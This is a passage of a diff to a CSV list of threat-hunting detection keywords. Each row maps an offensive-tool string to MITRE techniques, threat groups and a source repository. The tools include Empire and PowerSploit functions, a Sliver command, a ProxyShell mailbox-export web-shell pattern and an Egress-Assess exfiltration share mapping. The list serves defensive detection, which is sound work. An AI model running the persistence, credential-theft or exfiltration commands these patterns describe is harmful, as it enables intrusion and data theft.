- TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*network2john.lua*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*NetworkMiner*","offensive_tool_keyword","NetworkMiner","A Network Forensic Analysis Tool (NFAT)","T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","http://www.netresec.com/?page=NetworkMiner","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*new session to 127.0.0.1:3000*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" "*NewAdminAccountCreation.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*New-ElevatedPersistenceOption*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*New-ElevatedPersistenceOption*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*New-HoneyHash*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","New-HoneyHash.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*New-HoneyHash.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1086","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*New-InMemoryModule -ModuleName Win32*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*New-InMemoryModule*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*New-InMemoryModule*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-ElevatedPersistenceOption*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-ElevatedPersistenceOption*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*New-HoneyHash*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","New-HoneyHash.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-HoneyHash.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1086","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-InMemoryModule -ModuleName Win32*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-InMemoryModule*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-InMemoryModule*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-MailBoxExportRequest -Mailbox *@* -FilePath *.aspx*","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation Tools","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*new-operator --name * --lhost *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*new-operator --name * --lhost *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*New-PSAmsiScanner -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*New-PSDrive -Name T -PSProvider FileSystem -Root \\$IP\transfer *","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*New-RoutingPacket*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*New-UserPersistenceOption*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*New-UserPersistenceOption*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*New-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*New-RoutingPacket*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure 